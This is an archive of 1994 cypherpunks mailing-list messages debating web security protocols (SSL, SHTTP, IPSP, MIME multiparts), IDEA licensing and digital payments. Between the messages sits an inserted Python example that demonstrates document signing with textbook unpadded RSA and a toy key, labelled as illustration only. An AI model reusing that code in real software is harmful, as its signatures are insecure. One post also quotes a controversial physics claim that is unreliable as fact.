Message-ID: <9412131535.AA12199@snark.imsi.com>

Marc Andreessen) (by way of marca at mcom.com (Marc Andreessen) says:
> > ... The original denial of IPSP's
> > potential utility
>
> Likewise, I don't recall anyone denying IPSP's potential
> utility (particularly with emphasis on *potential*).

From what I can tell, SSL's utility is at least as *potential*.

.pm

From amanda at intercon.com Tue Dec 13 07:46:45 1994
From: amanda at intercon.com (Amanda Walker)
Date: Tue, 13 Dec 94 07:46:45 PST
Subject: HTTP security
Message-ID: <9412131046.AA05938@amanda.dial.intercon.com>

> This seems a very relevant criticism: Has Amanda, or anyone else
> proposed an extension to HTML that would incorporate such things?

Actually, it's not an extension to HTML, but to MIME (whose formats HTTP uses to tag and label data), and it just went to Proposed Standard (the last step before Internet Standard). The MIME multipart/signed and multipart/encrypted body parts allow anything using MIME encapsulation to sign and/or encrypt arbitrary body parts. Since it's at the document layer, it requires no special transport software, works with existing proxies and caching servers, and allows secure HTTP software to share code with secure email software (since it would use exactly the same formats). The framework is general enough to allow use with either PEM-compliant signatures and encryption or others (such as PGP). I believe that can also be used with symmetric key management, which could be useful for special purpose applications.

EInet's secure SHTTP proposal is also an end-to-end security framework.
Amanda Walker
InterCon Systems Corporation

From jya at pipeline.com Tue Dec 13 07:52:03 1994
From: jya at pipeline.com (John Young)
Date: Tue, 13 Dec 94 07:52:03 PST
Subject: Articles on Adelman and E=mc(2)
Message-ID: <199412131550.KAA23154@pipe3.pipeline.com>

The New York Times has an interesting article today on the life and career of Leonard Adleman, with remarks on RSA and public key cryptography. Friendly, not technical.

For email copy send blank message with subject: LA_lite

And, while not directly related to crypto, the magazine "The Sciences", published by the New York Academy of Sciences, has a long article, "Beyond E=mc(2)", on a controversial theory that mass is "only electric charge and energy". The authors are: Bernard Haisch, Alfonso Rueda and H. E. Puthoff.

For copy send blank message with subject: EMC2_too

Here is a brief excerpt:

Recent work by us and others now appears to offer a radically different insight into the relation E=mc(2), as well as into the very idea of mass itself. To put it simply, the concept of mass may be neither fundamental nor necessary in physics. In the view we will present, Einstein's formula is even more significant than physicists have realized. It is actually a statement about how much energy is required to give the appearance of a certain amount of mass, rather than about the conversion of one fundamental thing, energy, into another fundamental thing, mass.

Indeed, if that view is correct, there is no such thing as mass -- only electric charge and energy, which together create the illusion of mass. The physical universe is made up of massless electric charges immersed in a vast, energetic, all-pervasive electromagnetic field. It is the interaction of those charges and the electromagnetic field that creates the appearance of mass.
In other words, the magazine you now hold in your hands is massless; properly understood, it is physically nothing more than a collection of electric charges embedded in a universal energetic electromagnetic field and acted on by the field in such a way as to make you think the magazine has the property of mass. Its apparent weight and solidity arise from the interactions of charges and field.

Besides recasting the prevailing view of mass, this idea would address one of the most profound problems of physics, the riddle of how gravity can be unified with the other three fundamental forces of nature. The electromagnetic force and the weak force, which is responsible for nuclear decay, have been shown to be two manifestations of a single force, appropriately called the electroweak force. There are tantalizing hints that the strong force, which binds nuclei together, will someday be unified with the electroweak force. But until now gravity has resisted all attempts at unification. If the new view is correct, however, gravity would not need to be separately unified. Just as mass would arise from the electromagnetic force, so would gravity.

End excerpt.

From perry at imsi.com Tue Dec 13 07:55:14 1994
From: perry at imsi.com (Perry E. Metzger)
Date: Tue, 13 Dec 94 07:55:14 PST
Subject: the netscape/ssl controversy
In-Reply-To: <199412131448.JAA07613@cutter.clas.ufl.edu>
Message-ID: <9412131554.AA12240@snark.imsi.com>

Avi Harris Baumstein says:
> so what is a better solution?
>
> i would choose a mime multipart using pgp or some other cryptographic
> method.

There is now a "Security Multiparts" document that tells you just how to do this. Check the internet drafts directory...

Perry

From perry at imsi.com Tue Dec 13 08:06:31 1994
From: perry at imsi.com (Perry E.
Metzger)
Date: Tue, 13 Dec 94 08:06:31 PST
Subject: Articles on Adelman and E=mc(2)
In-Reply-To: <199412131550.KAA23154@pipe3.pipeline.com>
Message-ID: <9412131605.AA12267@snark.imsi.com>

John Young says:
> The New York Times has an interesting article today on the life
> and career of Leonard Adleman, with remarks on RSA and public
> key cryptography. Friendly, not technical.

The article contains a serious inaccuracy -- it credits Adleman with having invented the term "Computer Virus", when, in fact, it was probably John Brunner in his novel "The Shockwave Rider" over ten years earlier. It also inaccurately credits one of his students with developing the first one as a test, when in fact they existed for a long time before.

.pm

From amanda at intercon.com Tue Dec 13 08:23:57 1994
From: amanda at intercon.com (Amanda Walker)
Date: Tue, 13 Dec 94 08:23:57 PST
Subject: Clarification of my remarks about Netscape
Message-ID: <9412131124.AA32568@amanda.dial.intercon.com>

> Amanda, we're not trying to push anything into the standards track.
> We're publishing SSL as an informational RFC, and we have
> separately submitted SSL as a proposal to the W3O working group
> on security (in parallel with SHTTP and a handful of other
> proposals). Nothing is being pushed into the standards track.

Aha. This was not particularly clear from my reading of the SSL spec and the other stuff about SSL on your WWW server. If you're just issuing an informational RFC, then I have just become much less annoyed.

Amanda Walker
InterCon Systems Corp.
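The contrast that Avi Harris Baumstein and Amanda Walker draw in the messages above, between protecting the link and signing the document itself, can be run as a small model. This is an added example, not code from any poster or from the SSL or SHTTP specifications; the toy RSA key, the HMAC stand-in for a protected channel, the sample document and all function names are assumptions made for the illustration.

```python
import hashlib
import hmac

# Publisher's signing key, constructed for this example. The primes are the
# Mersenne primes 2**127-1 and 2**521-1: easy to write down, useless as a
# real key. Textbook hash-then-sign RSA without padding, illustration only.
P, Q = 2**127 - 1, 2**521 - 1
N, E = P * Q, 65537                      # public key (N, E)
D = pow(E, -1, (P - 1) * (Q - 1))        # private exponent, never on a server


def _digest(document: bytes) -> int:
    return int.from_bytes(hashlib.sha256(document).digest(), "big")


def sign_document(document: bytes) -> int:
    """Done once, offline, by the author of the document."""
    return pow(_digest(document), D, N)


def verify_document(document: bytes, signature: int) -> bool:
    """Done by the reader, with the public key only."""
    return pow(signature, E, N) == _digest(document)


def _mac(session_key: bytes, body: bytes) -> bytes:
    return hmac.new(session_key, body, hashlib.sha256).digest()


def serve(stored: dict, session_key: bytes) -> dict:
    """A server sends whatever is on its disk. The MAC under the session key
    stands in for a protected transport: it covers server-to-client only."""
    return {"body": stored["body"], "signature": stored["signature"],
            "mac": _mac(session_key, stored["body"])}


def client_checks(response: dict, session_key: bytes) -> dict:
    """Outcome of the transport check and of the document check."""
    return {
        "transport_ok": hmac.compare_digest(
            _mac(session_key, response["body"]), response["mac"]),
        "document_ok": verify_document(response["body"],
                                       response["signature"]),
    }


def run_scenarios() -> dict:
    # Constructed sample document and session key.
    genuine = b"Data sheet 17: dilute 1 part concentrate in 200 parts water.\n"
    altered = genuine.replace(b"200", b"20")
    signature = sign_document(genuine)
    key = b"constructed-session-key"

    honest = {"body": genuine, "signature": signature}
    # Server whose stored copy was changed; it holds no signing key,
    # so it can only pass along the old signature.
    compromised = {"body": altered, "signature": signature}

    results = {
        "honest server": client_checks(serve(honest, key), key),
        "compromised server": client_checks(serve(compromised, key), key),
    }
    # Modification on the wire after an honest server has sent the reply.
    in_transit = serve(honest, key)
    in_transit["body"] = altered
    results["altered in transit"] = client_checks(in_transit, key)
    return results


if __name__ == "__main__":
    for name, outcome in run_scenarios().items():
        print(f"{name:20} {outcome}")
```

The compromised-server row is the case raised in the thread: the channel check succeeds because the server itself protects what it sends, and only the author's signature exposes the change.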
From sommerfeld at orchard.medford.ma.us Tue Dec 13 08:28:24 1994
From: sommerfeld at orchard.medford.ma.us (Bill Sommerfeld)
Date: Tue, 13 Dec 94 08:28:24 PST
Subject: HTTP security
In-Reply-To: <9412131046.AA05938@amanda.dial.intercon.com>
Message-ID: <199412131615.LAA00818@orchard.medford.ma.us>

-----BEGIN PGP SIGNED MESSAGE-----

> > This seems a very relevant criticism: Has Amanda, or anyone else
> > proposed an extension to HTML that would incorporate such things?
>
> Actually, it's not an extension to HTML, but to MIME (whose formats
> HTTP uses to tag and label data), and it just went to Proposed
> Standard

Not just yet; they're currently arguing about this on the pem-dev list...

> (the last step before Internet Standard).

Nope, the IETF stds track is Proposed Standard -> Draft Standard -> Standard

> EInet's secure SHTTP proposal is also an end-to-end security framework.

Right, but with its preoccupation with negotiation, it seems to be more oriented towards securing the *transaction* rather than the *document*.

There are at least three different layers at which HTTP and "the web" can be secured:

1) - the *transport* (and lower) -- secured by IPSP and/or SSL
2) - the *transaction* (e.g, authentication for access control)
3) - the *document* (e.g., authentication by the document's author)

The difference between (1) and (2) becomes obvious when proxies are involved. Doing (2) complicates distributed caching, while (1) and (3) don't really get in the way of caches.

Frankly, I think that the web needs (3), then (1), and only later (2).

- Bill

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1
-----END PGP SIGNATURE-----

From perry at imsi.com Tue Dec 13 08:29:43 1994
From: perry at imsi.com (Perry E.
Metzger)
Date: Tue, 13 Dec 94 08:29:43 PST
Subject: Clarification of my remarks about Netscape
In-Reply-To: <9412131124.AA32568@amanda.dial.intercon.com>
Message-ID: <9412131629.AA12352@snark.imsi.com>

"Amanda Walker" says:
> > Amanda, we're not trying to push anything into the standards track.
> > We're publishing SSL as an informational RFC, and we have
> > separately submitted SSL as a proposal to the W3O working group
> > on security (in parallel with SHTTP and a handful of other
> > proposals). Nothing is being pushed into the standards track.
>
> Aha. This was not particularly clear from my reading of the SSL
> spec and the other stuff about SSL on your WWW server. If you're
> just issuing an informational RFC, then I have just become much less
> annoyed.

You, perhaps, but not me. They are publishing it as an informational RFC to get an end run around the IETF process in my opinion -- they fully intend for people to use the protocol on a non-experimental basis, so it isn't just "information". I may try to have a talk with the IESG and Postel before this publication happens.

Perry

From ekr at eit.COM Tue Dec 13 08:34:10 1994
From: ekr at eit.COM (Eric Rescorla)
Date: Tue, 13 Dec 94 08:34:10 PST
Subject: HTTP security
Message-ID: <9412131633.AA24750@eitech.eit.com>

See what happens when you call my name (or at least try to...)

James is >
Amanda is >>
>> This seems a very relevant criticism: Has Amanda, or anyone else
>> proposed an extension to HTML that would incorporate such things?
>Actually, it's not an extension to HTML, but to MIME (whose formats HTTP uses
>to tag and label data), and it just went to Proposed Standard (the last step
>before Internet Standard). The MIME multipart/signed and multipart/encrypted
>body parts allow anything using MIME encapsulation to sign and/or encrypt
>arbitrary body parts.
Since it's at the document layer, it requires no
>special transport software, works with existing proxies and caching servers,
>and allows secure HTTP software to share code with secure email software
>(since it would use exactly the same formats). The framework is general
>enough to allow use with either PEM-compliant signatures and encryption or
>others (such as PGP). I believe that can also be used with symmetric key
>management, which could be useful for special purpose applications.

Uh, PEM-MIME no longer supports symmetric key management.

>EInet's secure SHTTP proposal is also an end-to-end security framework.

Actually, it's EIT. EInet is an MCC (the people who did MacWeb, not to be confused with MCOM, the people who did Netscape. Confusing, ain't it?) project.

Anyway, the approach that Amanda describes is pretty much the one that SHTTP takes. We use already established encapsulation formats to do data encapsulation. SHTTP can be used to enhance either entire protocol messages or objects or both. (You can do both in the same message using a recursive encapsulation).

I think Amanda has done an adequate job of talking about end to end security, so I won't talk about that. I would like to briefly motivate why just using PEM-MIME isn't enough, though. (We considered it and believe me it would have been a lot easier on our brains and fingers...)

PEM-MIME and to a lesser extent PGP are basically cryptographic messaging formats intended for email type applications. However, the email model is fundamentally different from the Web model in a number of ways. Let me just give one example:

In the email world, you don't necessarily have any sort of prior relationship with the person you're communicating with and that public key cryptography is relatively cheap. (When it takes minutes to ship mail across the net, who's going to notice a second or two of signature verification?) However, in the case of the Web, things are very different.
When a server replies to one of my requests, we have definitely exchanged at least one message. Now, assume for the moment that my request was encrypted and that I desire confidentiality for the reply. There is no need for the server to perform public key crypto because we've had the opportunity to exchange a key already. This means a substantial performance improvement. [It incidentally means that a server and I can communicate privately even if I don't have a key pair].

When I say that just PEM-MIME is inadequate, I don't mean to imply that using it is inadequate, however. On the contrary, we use PEM and PKCS7 already and are gearing up to include PEM-MIME, now that it's going to proposed standard. [Incidentally, there's no reason you couldn't use PGP too, although I propose that it's most useful in the proposed PGP-MIME multiparts...] And you should be able to reuse your PEM-MIME engines to write SHTTP handlers. It's just that we also took on some issues that we thought were important that we couldn't steal solutions for..

-Ekr

From A5713643665 at attpls.net Tue Dec 13 08:39:06 1994
From: A5713643665 at attpls.net (Tom Jones)
Date: Tue, 13 Dec 94 08:39:06 PST
Subject: IDEA freeware
Message-ID: <8AF920A1>

Dear Kipp,

Please explain where this "freeware" IDEA code comes from. IDEA is a patented algorithm that cannot be used without a license. PGP comes with a license. I know of no other code in the US that has such a license.

Tom

From ekr at eit.COM Tue Dec 13 08:39:44 1994
From: ekr at eit.COM (Eric Rescorla)
Date: Tue, 13 Dec 94 08:39:44 PST
Subject: Correction
Message-ID: <9412131637.AA24834@eitech.eit.com>

My previous message about HTTP Security implied that you would (in SHTTP) reuse the DEK from say an HTTP request for the reply. You most certainly would not do this. (It's horribly bad key hygiene.) Rather, SHTTP provides a way to exchange a symmetric encryption key (in an HTTP message) that can subsequently be used to cover subsequent DEKs.
Sorry for the possible confusion...

-Ekr

From perry at imsi.com Tue Dec 13 08:44:25 1994
From: perry at imsi.com (Perry E. Metzger)
Date: Tue, 13 Dec 94 08:44:25 PST
Subject: HTTP security
In-Reply-To: <9412131633.AA24750@eitech.eit.com>
Message-ID: <9412131643.AA12378@snark.imsi.com>

Eric Rescorla says:
> In the email world, you don't necessarily have any sort of prior
> relationship with the person you're communicating with and that public
> key cryptography is relatively cheap. (When it takes minutes to
> ship mail across the net, who's going to notice a second or two
> of signature verification?) However, in the case of the Web,
> things are very different.

Since one can sign pages just once (they are written once and read often) and one can pick one's signature algorithm to speed up verifications relative to the signatures (using small exponents is the usual trick for this), I'm not sure it's that big a problem.

I'd like these algorithms to support the serving of signed pages from hosts that do not know the keys that the pages have been signed with -- offline signature schemes like the one I just described will support that nicely.

(However, any algorithm that is cognisant of the difference between securing the pages and just securing the channel is an improvement over the SSL proposal.)

.pm

From amanda at intercon.com Tue Dec 13 09:06:00 1994
From: amanda at intercon.com (Amanda Walker)
Date: Tue, 13 Dec 94 09:06:00 PST
Subject: HTTP security
Message-ID: <9412131206.AA35070@amanda.dial.intercon.com>

> Actually, it's EIT. EInet is an MCC (the people who did MacWeb, not to
> be confused with MCOM, the people who did Netscape. Confusing, ain't
> it?) project.

I think I'm starting to need a quick reference card :).

> When a server replies to one of my requests,
> we have definitely exchanged at least one message.
> Now, assume for the moment that my request was encrypted and that I
> desire confidentiality for the reply.
There is no need for the server
> to perform public key crypto because we've had the opportunity to
> exchange a key already. This means a substantial performance
> improvement. [It incidentally means that a server and I can
> communicate privately even if I don't have a key pair].

This is true. Just as an exercise, I'll give a description of the informal model that I have been using as I evaluate different proposals for secure HTTP (and other Internet security proposals).

(1) I trust the network somewhat more than I trust the server machine. This is why I don't like SSL, for example. Now, I realize that this assumption is not a universal (someone in a college dorm would trust the server a lot more than the network), but the fact is that once you get off your organizational Ethernet, it's hard to monitor the Internet. On the other hand, servers are a problem. If someone's running a web page on Netcom, for example, I don't want to have to worry about whether or not they've been broken into this week (note that I'm using Netcom strictly as an example--the same concern holds for any public access system). I want to be able to authenticate the content I am viewing without having to worry about whether or not the transport & server systems have been compromised. I'm still vulnerable to a denial of service attack, of course, but at least I can tell when I do get something that it is genuine. This concern holds even when I don't care if the content is encrypted. If I get sales literature, I want it signed by the organization it claims to be from, and so on. And for this purpose, I like X.509. Self-signed certificates are fine, if there are other ways to verify the public key. Signed PGP keys could be used as certificates as well, of course.

(2) I want authenticated content all the time, even if it's just to an anonymous key pair I've gotten through some other channel.

(3) I want private content sometimes.
When I want private content, I want end-to-end privacy, not just transport level privacy.

(4) Occasionally, I want transaction security (sending a credit card order, for example), where I want the transaction to be encrypted, signed, and not subject to playback attacks. Ideally, the server itself won't be able to decrypt it--only the actual recipient will.

In all cases, I expect the network and the server machines and software to be insecure. Anything else is simply unrealistic.

Amanda Walker

From jgrubs at voxbox.norden1.com Tue Dec 13 09:07:52 1994
From: jgrubs at voxbox.norden1.com (Jim Grubs, W8GRT)
Date: Tue, 13 Dec 94 09:07:52 PST
Subject: BofA+Netscape
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

Rick Busdiecker writes:
> Even Apple & Microsoft agree that Netscape is brain dead...

Is that the same Microsoft that brought us Edlin???

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
-----END PGP SIGNATURE-----

... "The greatest dangers to liberty lurk in the insidious encroachment of men of zeal, well meaning but without understanding." - Justice Louis Brandeis
--
jgrubs at voxbox.norden1.com (James C. Grubs, W8GRT)
Voxbox Enterprises, 6817 Maplewood Ave., Sylvania, Ohio 43560-1956
Tel.: 419/882-2697

From jgrubs at voxbox.norden1.com Tue Dec 13 09:07:57 1994
From: jgrubs at voxbox.norden1.com (Jim Grubs, W8GRT)
Date: Tue, 13 Dec 94 09:07:57 PST
Subject: Hal Finney & Bob Rae and Ontario's Parliament
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

Richard Martin ( frodo ) writes:
> Mea culpa. I was thrown by the US government's free use of it (I think
> they get that, don't they?). On a silly note, my government is not
> currently making money, and could hardly be classified as being in
> business.
;)

At least yours isn't planning a going out of business sale....

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
-----END PGP SIGNATURE-----

... "The greatest dangers to liberty lurk in the insidious encroachment of men of zeal, well meaning but without understanding." - Justice Louis Brandeis
--
jgrubs at voxbox.norden1.com (James C. Grubs, W8GRT)
Voxbox Enterprises, 6817 Maplewood Ave., Sylvania, Ohio 43560-1956
Tel.: 419/882-2697

From ekr at eit.COM Tue Dec 13 09:09:06 1994
From: ekr at eit.COM (Eric Rescorla)
Date: Tue, 13 Dec 94 09:09:06 PST
Subject: HTTP security
Message-ID: <9412131708.AA25651@eitech.eit.com>

I sent a slightly less polished version of this to Perry, and then realized he'd cc'ed Cypherpunks.. but it was gone by then...

Perry Metzger sez:
>Eric Rescorla says:
>> In the email world, you don't necessarily have any sort of prior
>> relationship with the person you're communicating with and that public
>> key cryptography is relatively cheap. (When it takes minutes to
>> ship mail across the net, who's going to notice a second or two
>> of signature verification?) However, in the case of the Web,
>> things are very different.
>Since one can sign pages just once (they are written once and read
>often) and one can pick one's signature algorithm to speed up
>verifications relative to the signatures (using small exponents is the
>usual trick for this), I'm not sure it's that big a problem.

You are of course correct. I should have chosen the example of encryption, where you can't preenhance.

>I'd like these algorithms to support the serving of signed pages from
>hosts that do not know the keys that the pages have been signed with
>-- offline signature schemes like the one I just described will
>support that nicely.

Yes.
Conveniently, we've anticipated this requirement. The content type of an SHTTP message can be set to indicate that the enhanced content is actually an enhanced document rather than an enhanced HTTP request/reply. So, you just cons up some headers and drop in the presigned page... But this is a very good point. I'm glad I'm not the only person who thinks this is an important requirement.

Details on this can be found in the current SHTTP spec (Section 2.3.3)

-Ekr

From hfinney at shell.portal.com Tue Dec 13 09:44:50 1994
From: hfinney at shell.portal.com (Hal)
Date: Tue, 13 Dec 94 09:44:50 PST
Subject: Authentication vs encryption: CPs on the web
Message-ID: <199412131744.JAA04700@jobe.shell.portal.com>

-----BEGIN PGP SIGNED MESSAGE-----

I notice in these discussions of security on the web that the topic blurs back and forth between authentication and encryption. Particularly when discussing using MIME with security extensions to "secure" a document by pre-signing it, this form of security does not add privacy. It does provide a useful service by allowing you to verify authorship, but my interests are in using cryptography to protect privacy. I think it is useful to keep a clearer distinction between these.

I notice that the people who come to this topic from an institutional point of view tend to be more interested in the authentication aspects. This seems to fit better into the control-oriented mindset. With authentication you can track what people are doing better; non-repudiable signatures could actually work in some ways against the signer. I think that may be one reason Phil Zimmermann is famous for not signing his messages. :-) But encryption can actually work against institutional interests (compared to individual ones) by making it harder to keep track of people's activities.

I exchanged email on this with Vint Cerf during the PEM standardization process. I objected to the fact that with PEM you could not encrypt a message unless you signed it.
Now of course you can always fake the signature if you need to but the principle seemed skewed to me. Cerf honestly could not understand why you would ever want to do this. What security could there be if the message were not signed, he wondered. To me the issues are separate. Encryption is used to make sure the message is seen by only those for whom it is intended, and signatures are used to verify the source of the message. The choice of which of these two transformations to apply should be up to the users.

I don't speak for other cypherpunks, but my interests with regard to web security extensions would lie in the following areas. I want to be able to use the web and maintain my privacy. I don't want snoopers on the net or on my local machine to know which web sites I visit or what material I download. (This ties into the electronic cash issue - what use is "anonymous" cash if everyone can see where I'm spending it and what I'm buying?) I also want to be able to hide my identity from the web servers themselves, at least if this is mutually agreeable. If a server wants to accept only authenticated connections where it knows who the users are that it is serving, fine. But I want the options to be there.

I want to be able to make payments to access and download information while protecting my privacy. I don't want to be put onto mailing lists or get my name into databases of people who like X without my permission. This implies a range of payment mechanisms including credit cards, digital checks, and digital cash. And it also requires the privacy and anonymity features above.

I want these features to be a matter of mutual negotiation between client and server. The protocols should not build in veto power for either side over how much privacy the transaction includes (although either side may choose not to participate if mutually agreeable terms can't be worked out).
And therefore these features should not be restricted to just a small fraction of transactions, where we drop into "secure mode" momentarily so I can send my credit card number. I want to be in secure mode all the time.

This is IMO the standard cypherpunks wish list as applied to the WWW. But it does not seem to match up with either the commercial or institutional interests which are driving the standards process. I hope those CP's who are involved in these efforts can work to spotlight the need for individual privacy. We should give as much power, choice, and control as possible to the individual end-users of the web. Otherwise privacy is going to be very difficult to maintain in this world of electronic commerce.

Hal Finney
hfinney at shell.portal.com

-----BEGIN PGP SIGNATURE-----
Version: 2.6
-----END PGP SIGNATURE-----

From eric at remailer.net Tue Dec 13 09:45:10 1994
From: eric at remailer.net (Eric Hughes)
Date: Tue, 13 Dec 94 09:45:10 PST
Subject: What, exactly is elliptic encryption?
In-Reply-To: <9412131447.AA12121@snark.imsi.com>
Message-ID: <199412131842.KAA02350@largo.remailer.net>

   From: "Perry E. Metzger"

   Basically, there are ways of extending public key methods into fields
   other than the integers modulo some prime

Small correction. While integers modulo a prime are fields (i.e. they have division), elliptic curve solutions only have a group structure, which is usually written as addition.

Eric

From raph at netcom.com Tue Dec 13 09:49:01 1994
From: raph at netcom.com (Raph Levien)
Date: Tue, 13 Dec 94 09:49:01 PST
Subject: More 40-bit RC4 nonsense
Message-ID: <199412131742.JAA27330@netcom5.netcom.com>

-----BEGIN PGP SIGNED MESSAGE-----

If I recall correctly, the first byte out of the RC4 stream has about a 40% chance of being the first byte of the key.
Thus, if the 40-bit "secret" part of the key is the _beginning_ of the full 128-bit key, then the keyspace is effectively reduced by about seven bits, meaning that I would be able to crack a key on my PC in a couple of days or so.

Of course, if the "clear" 88 bits went first, there would be no advantage whatsoever. The SSL document very carefully does not say how they combine the two key parts to form the 128-bit key. Does anyone know?

Raph

-----BEGIN PGP SIGNATURE-----
Version: 2.6
-----END PGP SIGNATURE-----

From kipp at warp.mcom.com Tue Dec 13 09:51:08 1994
From: kipp at warp.mcom.com (Kipp E.B. Hickman)
Date: Tue, 13 Dec 94 09:51:08 PST
Subject: IDEA freeware
In-Reply-To: <8AF920A1>
Message-ID: <9412130948.ZM18452@warp.mcom.com>

On Dec 13, 3:45pm, Tom Jones wrote:
> Subject: IDEA freeware
> Dear Kipp,
>
> Please explain where this "freeware" IDEA code comes from. IDEA is a
> patented algorithm that cannot be used without a license. PGP comes
> with a license. I know of no other code in the US that has such a
> license.

If you are using it for non-commercial use, it's free. Us commercial gooneys get stuck paying for everything :-|

In any case, here is a useful link:

http://www.openmarket.com/info/cryptography/applied_cryptography.html

It lists all of the goodies available from Bruce Schneier's book. Note that most of the data comes from italy...including DES. ha!

--
---------------------------------------------------------------------
Kipp E.B. Hickman
Netscape Communications Corp.
kipp at mcom.com
http://www.mcom.com/people/kipp/index.html

From kipp at warp.mcom.com Tue Dec 13 10:02:38 1994
From: kipp at warp.mcom.com (Kipp E.B.
Hickman) Date: Tue, 13 Dec 94 10:02:38 PST Subject: Clarification of my remarks about Netscape Message-ID: <9412131800.AA18475@warp.mcom.com> In article <199412130729.XAA01473 at jobe.shell.portal.com>, you write: > -----BEGIN PGP SIGNED MESSAGE----- > > It is nice to have a lot of people on the list from Netscape. > Here is a question about SSL relating to the use of certificates: > > + The issuer name must resolve to a name that is deemed > acceptable by the application using SSL. How the application > using SSL does this is outside the scope of this memo. > > What does Netscape actually do about this? If I want to make a server > which will interoperate with existing Netscape clients what kind of > certificate do I need, and what kind of name should be in there? > Thanks - > > Hal Finney > hfinney at shell.portal.com > > -----BEGIN PGP SIGNATURE----- > Version: 2.6 > > iQBVAwUBLu1NOxnMLJtOy9MBAQGItwIAr4eerI+FSmPpOIcwITepnXzcUUFkPwsK > +Rz2FC4Y6hV0HoDEt1JnpvCPVV5N74Jtc9xMmF8CcRlBybk25PkxVQ== > =LOql > -----END PGP SIGNATURE----- Because online directory services are not one of the extant solved problems on the Internet, Netscape uses a simple approach - a small set of "important issuer" certificates are compiled into the browser. A future release will support "key rings" ala PGP. This is all we had time for in this release... All you need to do is get your server certificate from one of several places, including: RSA (commercial CA or server CA) Netscape (not likely; we can't afford the liability) MCI (I don't know if they are selling this). So the short answer is: it's hard to do right now. In six months it should be a very different scenario. --------------------------------------------------------------------- Kipp E.B. Hickman Netscape Communications Corp. 
kipp at mcom.com          http://www.mcom.com/people/kipp/index.html

From anonymous-remailer at shell.portal.com  Tue Dec 13 10:15:06 1994
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Tue, 13 Dec 94 10:15:06 PST
Subject: BofA + Netscape
Message-ID: <199412131814.KAA07205@jobe.shell.portal.com>

> It seems that Perry and other are flaming Netscape for doing things
> their own way.
> Yes, Netscape have made a lot fuckups. But they are out there
> bringing really cool crypto to the masses.
> First guy on the block always does a lot of dumb fuckups.

This is by far the most intelligent commentary I've read so far in this
"NetScape" debate.

Does anybody remember PGP 1.0? Released in the summer of 1991, using
the Bass-O-Matic cipher... which was worthless.

This list didn't come into existence until around the same time PGP
2.0 came out. Thus, nobody railed against the weaknesses of PGP like
they are railing against NetScape.

So maybe the first version of NetScape could use some enhancements.
Just like PGP 1.0 did. Nobody would argue that based on the direction
of PGP 1.0, the whole PGP project should be scrapped. Or would they?

I think NetScape is doing overall good. Sure, improvements can be
made. But SOMETHING is being accomplished.

From kipp at warp.mcom.com  Tue Dec 13 10:18:06 1994
From: kipp at warp.mcom.com (Kipp E.B. Hickman)
Date: Tue, 13 Dec 94 10:18:06 PST
Subject: IPSP and Netscape
Message-ID: <9412131807.AA18482@warp.mcom.com>

In article <199412130302.TAA00871 at largo.remailer.net>, you write:
> I've tried really hard to stay out of this, but this one is just too much.
>
> The question is about IPSP, the swIPe-like IP level security protocol.
>
>    From: "Kipp E.B. Hickman"
>
>    Name one router that speaks the secure protocols you are
>    documenting? Name one PPP based bridge that does? Show me, today,
>    what percentage of the Internet is covered by these standards?
>
>    [ ... later ... ]
>
>    My company's network hardware is typical. It is filled with
>    expensive devices that don't understand IPSP or IPNG. In fact, most
>    of the world is constructed this way.
>
> The protocol does IP-within-IP encapsulation, which means that every
> single router deployed is able to carry the secured traffic.
>
> Now, this is not so egregious an error by itself (it is, but I'm being
> polite), but coupled with the claims that SSL is better than anything
> else out there, I see an argument from chauvinism rather than one from
> knowledge.
>
> Since IPSP works at the IP level rather than at the TCP level there
> are protocol stacks that have to change. This is not immediate. It
> may be that IPSP is not the quickest or best way to link security, but
> that is not the point I am making here. The original denial of IPSP's
> potential utility was made in complete ignorance, ignorance so great
> to lack even the most basic understanding of the subject at hand.
>
> I cannot trust abbreviated arguments from such a source. I can,
> however, examine ones which are complete and well thought out and
> demonstrate some understanding of tradeoffs.

I'm sorry you are so upset. :-(

IPSP was not in my vocabulary at the time of the first posting.
Ignorance was briefly bliss :^)

However, regardless of whether or not extant hardware is reusable,
there is still the not so small matter of software. Software for PC's,
MAC's and a host of UNIX machines before a workable secure network can
be constructed. It is a good thing that IPSP requires only software to
meet its goals. This same property is true of SSL.

Finally, I never said that "SSL is better than anything out there". I
don't know who did. All I said is that "SSL is something", which isn't
really saying much. SSL is A solution to A set of problems, namely
privacy and authentication.

---------------------------------------------------------------------
Kipp E.B. Hickman          Netscape Communications Corp.
kipp at mcom.com          http://www.mcom.com/people/kipp/index.html

From nsb at nsb.fv.com  Tue Dec 13 10:32:15 1994
From: nsb at nsb.fv.com (Nathaniel Borenstein)
Date: Tue, 13 Dec 94 10:32:15 PST
Subject: Brands excluded from digicash beta
In-Reply-To: <9412021548.AA17294@tadpole>
Message-ID:

I'm sorry that it took me so long to reply to this thread. I've been
travelling and came back to a backlog of over 3000 messages. (The 100
messages/day reported by the Digicash folks sounds really *pleasant* to
me right now -- I'm averaging around 350! :-) )

Excerpts from fv: 2-Dec-94 Re: Brands excluded from di.. db at Tadpole.COM (2508*)

> 2) A group of us went over the First Virtual stuff in detail
> last night over fajitas, and were practically rolling on the floor with laughter.

I'm delighted to hear that you're so easily amused. I hope your
merriment wasn't too disruptive to the other diners, who might have
drawn the mistaken conclusion that you were either rude, foolish, or
both.

> Basically they have an attitude
> of "Crypto is too hard, people won't want to use it." So
> instead, each transaction consists of an e-mail exchange
> which is converted ultimately into credit card transactions

Wrong. A First Virtual transaction takes place as a single step via
mail, FTP, or WWW. *After* the transaction there is an email exchange
to confirm the purchase, and although this exchange works as-is with
virtually any mail reader in the world, it can be largely automated by
an FV-enhanced mail reader. Ultimately, using such a tool you'll be
able click on a single button to confirm ALL of your recent
transactions, assuming they're all ones you want to authorize.

> The exposure time for the merchant is on the order of _90
> days_. All fraud, etc., is on the head of the merchant.

You're right about the 90 days for now; as I have stated many times,
this is an inevitable consequence of our extending the credit card
merchant system to unknown and untrusted sellers anywhere on the
Internet.
You can become an FV seller with no credit checks, and indeed with no
human intervention, so the 90 days protects us (and by extension the
community of legitimate buyers and sellers) against abusive sellers. As
I have also stated, however, we are working on a system whereby
legitimate sellers can go through a qualification process after which
the 90 day holding period will be completely waived. We cannot yet
announce a definite availability date for this facility, but it isn't
very far away.

> The bottom line here is that FV has a system which is
> much more sluggish than the DigiCash system, even though
> it doesn't use "hard" crypto.

